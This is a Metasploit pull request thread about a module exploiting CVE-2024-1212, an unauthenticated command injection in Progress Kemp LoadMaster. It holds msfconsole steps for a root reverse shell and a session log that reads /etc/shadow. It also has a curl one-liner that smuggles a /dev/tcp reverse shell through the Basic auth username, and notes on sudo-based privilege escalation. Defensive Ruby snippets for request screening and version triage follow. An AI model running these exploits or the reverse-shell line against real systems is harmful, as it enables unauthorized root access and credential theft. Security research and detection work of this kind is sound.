Progress LoadMaster unauthenticated command injection module CVE-2024-1212
Verification
For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
The AWS marketplace (https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw) has free trials which can be used by deploying a version before 7.2.59.2 (7.2.59.0). These require "session management" to be enabled in order for the exploit to work, since by default the admin WUI is behind basic auth.
To enable session management:
- Log into the admin portal at: https://LM-IP:8443/
- Go to Certificates & Security > Admin WUI Access > "Enable Session Management"
- Log out, refresh and try the exploit.
With privesc:
- Install the application
- Start msfconsole
- Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
- Do: `set RHOSTS <target loadmaster>`
- Do: `set RPORT <port loadmaster is running on>`
- Do: `set LHOST <your host IP>`
- Do: `run`
- You should get a root shell.
Without privesc:
- Install the application
- Start msfconsole
- Do: `use exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection`
- Do: `set PRIVESC false`
- Do: `set RHOSTS <target loadmaster>`
- Do: `set RPORT <port loadmaster is running on>`
- Do: `set LHOST <your host IP>`
- Do: `run`
- You should get a shell as the "bal" user.
Example demonstration:
```
msf6 > use exploit/linux/http/progress_kemp_loadmaster_unauth_cmd_injection
[*] Using configured payload cmd/linux/https/x64/shell/reverse_tcp
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RPORT 8443
RPORT => 8443
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set RHOSTS 18.207.251.125
RHOSTS => 18.207.251.125
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > set LHOST ******
LHOST => ******
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > exploit
[*] Started reverse TCP handler on *****:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 18.207.251.125:8443 is vulnerable...
[+] The target is vulnerable.
[*] Sending payload...
[*] Sending stage (38 bytes) to 18.207.251.125
[*] Sending stage (38 bytes) to 18.207.251.125
[*] Executing privilege escalation command...
[-] Detected a session initiated too close to the first session. Terminating it.
[*] 18.207.251.125 - Command shell session 2 closed.
[*] Executing privilege escalation command...
[*] Command shell session 2 opened (*****:4444 -> 18.207.251.125:12652) at 2024-03-18 18:34:50 +0000
[-] Invalid session identifier: 2
msf6 exploit(linux/http/progress_kemp_loadmaster_unauth_cmd_injection) > sessions -i 1
[*] Starting interaction with 1...
[*] Command shell session 1 opened (*****:4444 -> 18.207.251.125:12648) at 2024-03-18 18:35:10 +0000
cat /.mnt/patch_name /etc/shadow
7.2.59.0.22007.RELEASE
root:*:11449:0:10000::::
bin:*:8902:0:10000::::
daemon:*:8902:0:10000::::
nobody:*:0:0:10000::::
sshd:*:0:0:10000::::
```
OK, so CVE-2024-1212 is a command injection vulnerability, but what about the priv esc? Your blog says:
> Once command execution is obtained, it is possible to escalate privileges to root from the default admin "bal" user by abusing sudo entries, granting full control of the device.

I cannot find a matching method overwriting `loadkeys` for `sudo` abuse, but it looks like a configuration issue, so I'm assuming it is not considered a new vulnerability?
Yeah, this is just one method. The bal user is considered an admin user and can run several commands with `sudo`, including changing any user's password. I used the method I chose in this module just because it avoids any permanent changes like changing the root password.
When I go to the loadmaster website, the only download is 7.2.59.2, which after install is 7.2.59.2.22338, and is patched against this vuln. I'm happy to create a trial account to get a license, but is there anywhere I can download the vulnerable VM?
Currently the only way I know to get the vulnerable version is via the AWS marketplace:
The AWS marketplace (https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw) has free trials which can be used by deploying a version before 7.2.59.2 (7.2.59.0). These require "session management" to be enabled in order for the exploit to work, since by default in AWS the admin WUI is behind basic auth.
To enable session management:
- Log into the admin portal at: https://LM-IP:8443/
- Go to Certificates & Security > Admin WUI Access > "Enable Session Management"
- Log out, refresh and try the exploit.
I'm happy to send the VM.
@wvu You rock; let me know how.
@bwatters-r7 I pinged you on the hellsite!
OK; I got the software; thanks @wvu ! I was also able to modify the priv esc section to work with Meterpreter or shell sessions and added in logic to force the payload to only launch once using fetch payloads. I need to verify that the logic works across all cmd payloads and run it by some others because some of what I did to get the payload changed is a bit odd on the Metasploit Framework side.
Out of curiosity, do we know if that priv esc works on the latest release? I'm happy to test on my own, but the diagnostic shell does not have `sudo` or `loadkeys`. Alternatively, if there's a way to drop into a real shell, I'll check if it was patched myself.
@wvu found a much cleaner way to get a root shell: https://x.com/wvuuuuuuuuuuuuu/status/1770728321166278885?s=20 Still would need to test it in the module but probably better to just use this method on the initial command injection, remove the complexity of the privesc altogether.
```
curl -kv "https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1'
```
`rsync` was also another good option!
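The one-liner above carries the injected shell text in the HTTP Basic username sent to the admin WUI's `/access/` endpoints. As an added example, not code from this PR or from the module, here is a proxy-side screening check in Ruby that decodes that header and flags usernames containing shell metacharacters; the request hash layout and the "safe username" character set are assumptions.

```ruby
# Added example (not the module's code and not from this PR): screens a request
# to the LoadMaster admin WUI for the CVE-2024-1212 vector shown above, where
# shell text is smuggled in the HTTP Basic username sent to /access/ endpoints.
# Intended for a reverse proxy or WAF in front of the WUI; the request hash
# layout and the "safe username" character set are assumptions of this example.

# Characters that belong on a shell command line, not in a WUI username.
SHELL_METACHARS = /[;&|`$'"<>()\n]/

# Build an Authorization header value the way a client would (no newlines).
def basic_header(user, password)
  'Basic ' + ["#{user}:#{password}"].pack('m0')
end

# Decode "Basic <base64>" into [user, password]; nil if the header is malformed.
def decode_basic_auth(header)
  m = header.to_s.match(%r{\ABasic\s+([A-Za-z0-9+/=]+)\z})
  return nil unless m
  user, password = m[1].unpack1('m0').split(':', 2)
  [user.to_s, password.to_s]
rescue ArgumentError
  nil # not valid base64
end

# Findings for one request; an empty array means nothing suspicious.
# req is { path: "/access/set?...", headers: { "Authorization" => "Basic ..." } }.
def screen_loadmaster_request(req)
  findings = []
  return findings unless req[:path].to_s.start_with?('/access/')
  creds = decode_basic_auth(req[:headers]['Authorization'])
  return findings if creds.nil?
  user, _password = creds
  findings << :empty_username if user.empty?
  findings << :shell_metachars_in_username if user.match?(SHELL_METACHARS)
  findings
end

# Constructed sample requests: a normal admin login and a crafted username.
SAMPLE_REQUESTS = [
  { path: '/access/set?param=enableapi&value=1',
    headers: { 'Authorization' => basic_header('bal', 'ExamplePass') } },
  { path: '/access/set?param=enableapi&value=1',
    headers: { 'Authorization' => basic_header("';uname;'", 'x') } }
].freeze

def screen_samples
  SAMPLE_REQUESTS.map { |r| screen_loadmaster_request(r) }
end
```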
This will get a root shell via CVE-2024-1212 on v7.2.59.0.22007; I'm asking/trying to figure out if the separate priv esc technique of copying `bash` to `loadkeys` still works on v7.2.59.2.22338. I can't use the exploit to get a shell because it is patched.
Basically, if that priv esc technique works on versions that CVE-2024-1212 does not, we should split this into 2 modules.
I was able to check root privescs on 7.2.59.2.22338, which is not vulnerable to CVE-2024-1212. The sudo entries and other privescs still exist.
Thank you! If that's the case, we really should split this into 2 modules. I'm happy to split it up and do a PR to this PR since you've already put a lot of work into it, but I don't want to get in your way if it is something you'd like to pursue. Let me know if I should do it, or if you'd like to do it. Since I'll base it off of your work, even if I do the work to split it, you will remain a contributor and main author of the modules.
No problem having you take that if you already have a plan to split them.
I don't want anyone to think I've forgotten about this. I've got the exploit working great with prepend to enforce the "run once" flag, and I'm nearly there on the separate priv esc module. I'll PR to this branch for the exploit, and open a new PR for the priv esc. Thanks for your patience, @DaveYesland
Wow; sorry this took so long! https://github.com/DaveYesland/metasploit-framework/pull/1
Awesome looks good! Is there anything else needed from me here?
Yes; if the changes are good with you, please merge them into your branch. After that, I'll get another contributor to approve them, and I can land this branch to the main branch. If you are really busy and/or are uninterested in landing my PR to your branch, I can close this PR and PR my branch to the main branch and close this PR. It would result in the PR going under my name rather than yours, though. I think I could probably also do a force push of the changes to this branch, but the easiest and best way is for you to merge my PR to your branch.
Release Notes
This adds a module targeting CVE-2024-1212, an unauthenticated command injection vulnerability in Kemp Progress Loadmaster versions after 7.2.48.1, but patched in 7.2.59.2 (GA), 7.2.54.8 (LTSF) and 7.2.48.10 (LTS).
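The version ranges in the release notes, turned into a triage check, as an added example that is not part of this PR or the module: it parses build strings in the format the console session above prints (`7.2.59.0.22007.RELEASE`) and reports whether that build falls inside the affected range. Mapping builds to branches (7.2.48.x as LTS, 7.2.54.x as LTSF, everything else as GA) and reading "after 7.2.48.1" literally as the lower bound are assumptions.

```ruby
# Added example (not part of this PR or the module): triage a LoadMaster build
# string against the CVE-2024-1212 ranges from the release notes. Branch mapping
# (7.2.48.x = LTS, 7.2.54.x = LTSF, anything else = GA) and the literal reading
# of "after 7.2.48.1" as the lower bound are assumptions of this example.

FIRST_AFFECTED = [7, 2, 48, 1].freeze # builds strictly newer are affected

# Fixed builds per support branch, from the release notes.
FIXED_VERSIONS = {
  lts:  [7, 2, 48, 10],
  ltsf: [7, 2, 54, 8],
  ga:   [7, 2, 59, 2]
}.freeze

# "7.2.59.0.22007.RELEASE" -> [7, 2, 59, 0]; build number and suffix are ignored.
def parse_loadmaster_version(str)
  parts = str.to_s.scan(/\d+/).first(4).map(&:to_i)
  raise ArgumentError, "unparseable LoadMaster version: #{str.inspect}" if parts.length < 4
  parts
end

# Which fixed build applies depends on the branch the device tracks.
def loadmaster_branch(version)
  case version.first(3)
  when [7, 2, 48] then :lts
  when [7, 2, 54] then :ltsf
  else :ga
  end
end

# :vulnerable, :patched, or :unaffected (at or below 7.2.48.1, outside the
# range the release notes describe). Arrays compare element by element.
def cve_2024_1212_status(version_string)
  v = parse_loadmaster_version(version_string)
  return :unaffected if (v <=> FIRST_AFFECTED) <= 0
  (v <=> FIXED_VERSIONS[loadmaster_branch(v)]) >= 0 ? :patched : :vulnerable
end
```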